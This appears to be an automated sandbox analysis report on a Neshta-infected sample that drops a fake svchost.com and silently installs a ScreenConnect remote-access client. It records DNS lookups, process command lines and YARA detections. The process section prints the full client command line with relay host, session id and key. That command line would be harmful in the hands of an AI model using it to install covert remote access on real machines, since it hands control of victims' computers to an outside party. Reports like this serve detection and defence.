                                                                        Oct 1, 2021 21:52:11.732439041 CEST53648018.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:12.228310108 CEST6172153192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:12.242255926 CEST53617218.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:13.195873976 CEST5125553192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:13.319734097 CEST53512558.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:14.824449062 CEST6152253192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:14.839363098 CEST53615228.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:16.981220961 CEST5233753192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:17.067363024 CEST53523378.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:19.601720095 CEST5504653192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:19.614783049 CEST53550468.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:19.861962080 CEST4961253192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:19.878940105 CEST53496128.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:21.307898998 CEST4928553192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:21.323544025 CEST53492858.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:21.900173903 CEST5060153192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:21.914057970 CEST53506018.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:23.929052114 CEST6087553192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:23.951000929 CEST53608758.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:52:42.670301914 CEST5644853192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:52:42.683744907 CEST53564488.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:53:02.352579117 CEST5917253192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:53:02.382389069 CEST53591728.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:53:04.205233097 CEST6242053192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:53:04.218379974 CEST53624208.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:53:16.809938908 CEST6057953192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:53:16.825300932 CEST53605798.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:54:08.403628111 CEST5018353192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:54:08.418592930 CEST53501838.8.8.8192.168.2.4
                                                                        Oct 1, 2021 21:55:25.025949955 CEST6153153192.168.2.48.8.8.8
                                                                        Oct 1, 2021 21:55:25.048744917 CEST53615318.8.8.8192.168.2.4

                                                                        ICMP Packets

                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                        Oct 1, 2021 21:51:23.804183006 CEST192.168.2.1192.168.2.48344(Port unreachable)Destination Unreachable
                                                                        Oct 1, 2021 21:51:30.696204901 CEST192.168.2.1192.168.2.4832d(Port unreachable)Destination Unreachable
                                                                        Oct 1, 2021 21:51:40.875575066 CEST192.168.2.1192.168.2.4836b(Port unreachable)Destination Unreachable

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Oct 1, 2021 21:51:39.173830032 CEST192.168.2.48.8.8.80xfc28Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:40.349257946 CEST192.168.2.48.8.8.80xa56Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:43.272902966 CEST192.168.2.48.8.8.80xb519Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:47.643362045 CEST192.168.2.48.8.8.80x7795Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:54.412354946 CEST192.168.2.48.8.8.80xa0b1Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:52:04.599450111 CEST192.168.2.48.8.8.80x2d4Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:52:19.861962080 CEST192.168.2.48.8.8.80x6acdStandard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:52:42.670301914 CEST192.168.2.48.8.8.80x82f8Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:53:16.809938908 CEST192.168.2.48.8.8.80x5b13Standard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:54:08.403628111 CEST192.168.2.48.8.8.80x2bdStandard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:55:25.025949955 CEST192.168.2.48.8.8.80x7e4fStandard query (0)instance-qchhoo-relay.screenconnect.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Oct 1, 2021 21:51:39.189588070 CEST8.8.8.8192.168.2.40xfc28No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:51:39.189588070 CEST8.8.8.8192.168.2.40xfc28No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:40.363372087 CEST8.8.8.8192.168.2.40xa56No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:51:40.363372087 CEST8.8.8.8192.168.2.40xa56No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:43.288008928 CEST8.8.8.8192.168.2.40xb519No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:51:43.288008928 CEST8.8.8.8192.168.2.40xb519No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:47.657860041 CEST8.8.8.8192.168.2.40x7795No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:51:47.657860041 CEST8.8.8.8192.168.2.40x7795No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:51:54.426678896 CEST8.8.8.8192.168.2.40xa0b1No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:51:54.426678896 CEST8.8.8.8192.168.2.40xa0b1No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:52:04.613214016 CEST8.8.8.8192.168.2.40x2d4No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:52:04.613214016 CEST8.8.8.8192.168.2.40x2d4No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:52:19.878940105 CEST8.8.8.8192.168.2.40x6acdNo error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:52:19.878940105 CEST8.8.8.8192.168.2.40x6acdNo error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:52:42.683744907 CEST8.8.8.8192.168.2.40x82f8No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:52:42.683744907 CEST8.8.8.8192.168.2.40x82f8No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:53:16.825300932 CEST8.8.8.8192.168.2.40x5b13No error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:53:16.825300932 CEST8.8.8.8192.168.2.40x5b13No error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:54:08.418592930 CEST8.8.8.8192.168.2.40x2bdNo error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:54:08.418592930 CEST8.8.8.8192.168.2.40x2bdNo error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)
                                                                        Oct 1, 2021 21:55:25.048744917 CEST8.8.8.8192.168.2.40x7e4fNo error (0)instance-qchhoo-relay.screenconnect.comserver-nixce85832f-relay.screenconnect.comCNAME (Canonical name)IN (0x0001)
                                                                        Oct 1, 2021 21:55:25.048744917 CEST8.8.8.8192.168.2.40x7e4fNo error (0)server-nixce85832f-relay.screenconnect.com145.40.105.136A (IP address)IN (0x0001)

                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: $RUX313H.exe PID: 6336 Parent PID: 6528

                                                                        General

                                                                        Start time:21:52:19
                                                                        Start date:01/10/2021
                                                                        Path:C:\Users\user\Desktop\$RUX313H.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\$RUX313H.exe'
                                                                        Imagebase:0x400000
                                                                        File size:4193672 bytes
                                                                        MD5 hash:08EA055B45225EC89643836BAE3C0446
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: $RUX313H.exe PID: 6792 Parent PID: 6336

                                                                        General

                                                                        Start time:21:52:21
                                                                        Start date:01/10/2021
                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe'
                                                                        Imagebase:0xdf0000
                                                                        File size:4152200 bytes
                                                                        MD5 hash:47264A537967C64B5651F5E2932CA18A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, Author: Joe Security
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: svchost.com PID: 5568 Parent PID: 6792

                                                                        General

                                                                        Start time:21:52:25
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\svchost.com
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'
                                                                        Imagebase:0x400000
                                                                        File size:41472 bytes
                                                                        MD5 hash:36FD5E09C417C767A952B4609D73A54B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Windows\svchost.com, Author: Joe Security
                                                                        Reputation:moderate

                                                                        Chronological Activities

                                                                        Analysis Process: msiexec.exe PID: 5468 Parent PID: 5568

                                                                        General

                                                                        Start time:21:52:25
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: msiexec.exe PID: 5648 Parent PID: 568

                                                                        General

                                                                        Start time:21:52:26
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                        Imagebase:0x7ff777c90000
                                                                        File size:66048 bytes
                                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: msiexec.exe PID: 5184 Parent PID: 5648

                                                                        General

                                                                        Start time:21:52:27
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: rundll32.exe PID: 5384 Parent PID: 5184

                                                                        General

                                                                        Start time:21:52:27
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                        Imagebase:0x950000
                                                                        File size:61952 bytes
                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: msiexec.exe PID: 864 Parent PID: 5648

                                                                        General

                                                                        Start time:21:52:31
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: msiexec.exe PID: 3240 Parent PID: 5648

                                                                        General

                                                                        Start time:21:52:32
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000
                                                                        Imagebase:0xfe0000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: ScreenConnect.ClientService.exe PID: 6356 Parent PID: 568

                                                                        General

                                                                        Start time:21:52:32
                                                                        Start date:01/10/2021
                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN'
                                                                        Imagebase:0x3f0000
                                                                        File size:90504 bytes
                                                                        MD5 hash:79EC78769BF8092719B0E72B174BAB54
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1207076385.0000000003DB2000.00000002.00020000.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: ScreenConnect.WindowsClient.exe PID: 5196 Parent PID: 6356

                                                                        General

                                                                        Start time:21:52:37
                                                                        Start date:01/10/2021
                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User'
                                                                        Imagebase:0x920000
                                                                        File size:529288 bytes
                                                                        MD5 hash:5597916ED66980D09C38DD206054CD6F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1187139644.0000000000922000.00000002.00020000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1203004972.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000000.699734443.0000000000922000.00000002.00020000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: svchost.exe PID: 5600 Parent PID: 568

                                                                        General

                                                                        Start time:21:52:41
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff6eb840000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: svchost.exe PID: 6008 Parent PID: 568

                                                                        General

                                                                        Start time:21:52:52
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff6eb840000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: svchost.exe PID: 4788 Parent PID: 568

                                                                        General

                                                                        Start time:21:53:05
                                                                        Start date:01/10/2021
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                        Imagebase:0x7ff6eb840000
                                                                        File size:51288 bytes
                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: $RUX313H.exe PID: 6336 Parent PID: 6528 $RUX313H.exeCOMMON

                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:3.8%
                                                                          Total number of Nodes:927
                                                                          Total number of Limit Nodes:9

                                                                          Graph

                                                                          execution_graph 9489 4080e4 9518 403f14 GetModuleHandleA 9489->9518 9491 408102 9520 4070dc 9491->9520 9498 408197 9574 407e90 9498->9574 9501 40819c 9607 404ae8 9501->9607 9504 4081fb 9646 4079a0 9504->9646 9506 4049d0 27 API calls 9508 4081c3 9506->9508 9613 406fe4 9508->9613 9515 4049d0 27 API calls 9516 4081f3 9515->9516 9623 407d9c 9516->9623 9519 403f47 9518->9519 9519->9491 9521 4049d0 27 API calls 9520->9521 9522 4070f9 9521->9522 9690 404c78 9522->9690 9527 4049d0 9528 404a23 GetCommandLineA 9527->9528 9529 4049fb GetModuleFileNameA 9527->9529 9531 404a2a 9528->9531 9882 403184 9529->9882 9536 4031c4 25 API calls 9531->9536 9533 404ac1 9534 403094 11 API calls 9533->9534 9535 404ad9 9534->9535 9541 404f6c FindFirstFileA 9535->9541 9537 404a5c 9536->9537 9887 403464 9537->9887 9539 404a70 9539->9533 9540 403464 25 API calls 9539->9540 9540->9533 9542 404f87 9541->9542 9543 404f7c FindClose 9541->9543 9542->9498 9544 407678 9542->9544 9543->9542 9545 407680 9544->9545 9545->9545 9894 405008 GetTempPathA 9545->9894 9547 4076a1 9901 403214 9547->9901 9549 4076c9 9915 404de0 9549->9915 9552 405008 26 API calls 9553 4076df 9552->9553 9933 4032cc 9553->9933 9555 40772b 9556 405200 29 API calls 9555->9556 9557 407736 9556->9557 9558 4049d0 27 API calls 9557->9558 9559 407743 9558->9559 9560 405b60 26 API calls 9559->9560 9561 40774e 9560->9561 9562 405008 26 API calls 9561->9562 9563 40776a 9562->9563 9564 4049d0 27 API calls 9563->9564 9565 407798 9564->9565 9566 404ed0 25 API calls 9565->9566 9567 4077a9 9566->9567 9568 4032cc 25 API calls 9567->9568 9569 4077bf 9568->9569 9570 405b24 26 API calls 9569->9570 9571 4077cf 9570->9571 9572 405be8 25 API calls 9571->9572 9573 40786c 9572->9573 9573->9498 9575 407e98 9574->9575 9575->9575 10003 404f90 GetWindowsDirectoryA 9575->10003 9577 407eb6 9578 403214 25 API calls 9577->9578 9579 407ed5 9578->9579 10010 404b9c 9579->10010 9582 408005 9585 4030b8 11 API calls 9582->9585 9583 407ee5 10014 405c80 9583->10014 9587 40801f 9585->9587 9587->9501 9588 404f90 26 API calls 9589 407f03 9588->9589 9590 403214 25 API calls 9589->9590 9591 407f22 9590->9591 10017 405e04 9591->10017 9593 407f2d 9596 404b9c GetFileAttributesA 9593->9596 9604 407f5f 9593->9604 10031 405cec 9593->10031 9594 407fb6 9595 404f90 26 API calls 9594->9595 9598 407fbe 9595->9598 9596->9593 9600 403214 25 API calls 9598->9600 9601 407fdd 9600->9601 10099 405e50 9601->10099 9604->9594 9605 405cec 11 API calls 9604->9605 10035 4071d0 9604->10035 10087 407130 9604->10087 9605->9604 9606 407fe8 9606->9501 9608 404afe 9607->9608 9609 4049d0 27 API calls 9608->9609 9610 404b12 9608->9610 9609->9608 9611 403094 11 API calls 9610->9611 9612 404b27 9611->9612 9612->9504 9612->9506 9614 406ffd 9613->9614 10377 404f18 9614->10377 9618 407029 10386 403258 9618->10386 9620 40703d 9621 4030b8 11 API calls 9620->9621 9622 407063 9621->9622 9622->9504 9622->9515 9624 407db4 9623->9624 9625 407dd4 9624->9625 9626 407dca 9624->9626 10401 407bd4 9625->10401 9627 4071d0 108 API calls 9626->9627 9629 407dd2 9627->9629 9630 404ae8 27 API calls 9629->9630 9638 407de1 9630->9638 9631 407e28 10420 406f34 9631->10420 9634 4049d0 27 API calls 9634->9638 9635 4032cc 25 API calls 9636 407e4c 9635->9636 9640 407e54 WinExec 9636->9640 9637 407e12 9639 4049d0 27 API calls 9637->9639 9641 407bd4 36 API calls 9637->9641 9638->9631 9638->9634 9638->9637 9643 4071d0 108 API calls 9638->9643 9639->9637 9642 407e67 9640->9642 9641->9638 9644 4030b8 11 API calls 9642->9644 9643->9638 9645 407e74 9644->9645 9645->9504 9647 4079ce 9646->9647 9648 404f90 26 API calls 9647->9648 9649 4079ec 9648->9649 9650 403258 25 API calls 9649->9650 9651 4079f8 9650->9651 9652 404b9c GetFileAttributesA 9651->9652 9653 407a00 9652->9653 9654 407a12 9653->9654 9655 407a04 9653->9655 10466 404bf8 9654->10466 9656 407a0c DeleteFileA 9655->9656 9656->9654 9658 407aa9 9659 4030b8 11 API calls 9658->9659 9661 407ac3 9659->9661 9660 407a29 9660->9658 10477 40575c 9660->10477 9669 40759c 9661->9669 9663 407a60 9664 403258 25 API calls 9663->9664 9665 407a96 9664->9665 10481 40578c 9665->10481 10489 406e94 9669->10489 9671 407641 9673 4030b8 11 API calls 9671->9673 9672 4075b9 9672->9671 10502 404018 CreateMutexA 9672->10502 9675 40765b 9673->9675 9686 4030b8 9675->9686 9676 4075e3 GetLastError 9676->9671 9677 4075f1 9676->9677 10503 406d40 GetLogicalDriveStringsA 9677->10503 9679 407636 10523 406e0c 9679->10523 9681 4031b4 25 API calls 9683 4075f9 9681->9683 9683->9679 9683->9681 9684 403214 25 API calls 9683->9684 10512 4074b4 9683->10512 9684->9683 9688 4030be 9686->9688 9687 4030e4 9688->9687 9689 402468 11 API calls 9688->9689 9689->9688 9705 4031c4 9690->9705 9694 404cb4 9695 404cd0 9694->9695 9714 404bc4 ReadFile 9694->9714 9698 403094 11 API calls 9695->9698 9700 404ce5 9698->9700 9701 403094 9700->9701 9702 40309a 9701->9702 9704 4030b5 9701->9704 9702->9704 9878 402468 9702->9878 9704->9527 9709 403184 9705->9709 9707 403194 9708 403094 11 API calls 9707->9708 9710 4031ac 9708->9710 9717 403158 9709->9717 9711 404b68 9710->9711 9712 404b77 9711->9712 9713 404b79 CreateFileA 9711->9713 9712->9713 9713->9694 9715 404bd9 9714->9715 9716 404b90 CloseHandle 9715->9716 9716->9695 9718 403180 9717->9718 9719 40315c 9717->9719 9718->9707 9722 402448 9719->9722 9723 40244d 9722->9723 9724 402460 9722->9724 9728 401e74 9723->9728 9724->9707 9725 402453 9725->9724 9739 402530 9725->9739 9729 401e8d 9728->9729 9730 401e88 9728->9730 9732 401eba RtlEnterCriticalSection 9729->9732 9733 401ec4 9729->9733 9738 401e99 9729->9738 9745 401788 RtlInitializeCriticalSection 9730->9745 9732->9733 9733->9738 9752 401d80 9733->9752 9736 401fe5 RtlLeaveCriticalSection 9737 401fef 9736->9737 9737->9725 9738->9725 9740 4024e4 9739->9740 9741 402509 9740->9741 9844 403ec8 9740->9844 9852 4024d8 9741->9852 9746 4017ac RtlEnterCriticalSection 9745->9746 9747 4017b6 9745->9747 9746->9747 9748 4017d4 LocalAlloc 9747->9748 9749 4017ee 9748->9749 9750 401833 RtlLeaveCriticalSection 9749->9750 9751 40183d 9749->9751 9750->9751 9751->9729 9755 401d90 9752->9755 9753 401dbc 9757 401de0 9753->9757 9763 401b94 9753->9763 9755->9753 9755->9757 9758 401cf4 9755->9758 9757->9736 9757->9737 9767 401548 9758->9767 9760 401d04 9762 401d11 9760->9762 9776 401c68 9760->9776 9762->9755 9764 401bb2 9763->9764 9765 401be9 9763->9765 9764->9757 9765->9764 9812 401ae4 9765->9812 9772 401564 9767->9772 9769 40156e 9783 401434 9769->9783 9772->9769 9773 40157a 9772->9773 9774 4015bf 9772->9774 9787 4012a0 9772->9787 9795 40119c 9772->9795 9773->9760 9799 40137c 9774->9799 9803 401c1c 9776->9803 9779 40119c LocalAlloc 9780 401c8c 9779->9780 9782 401c94 9780->9782 9807 4019c0 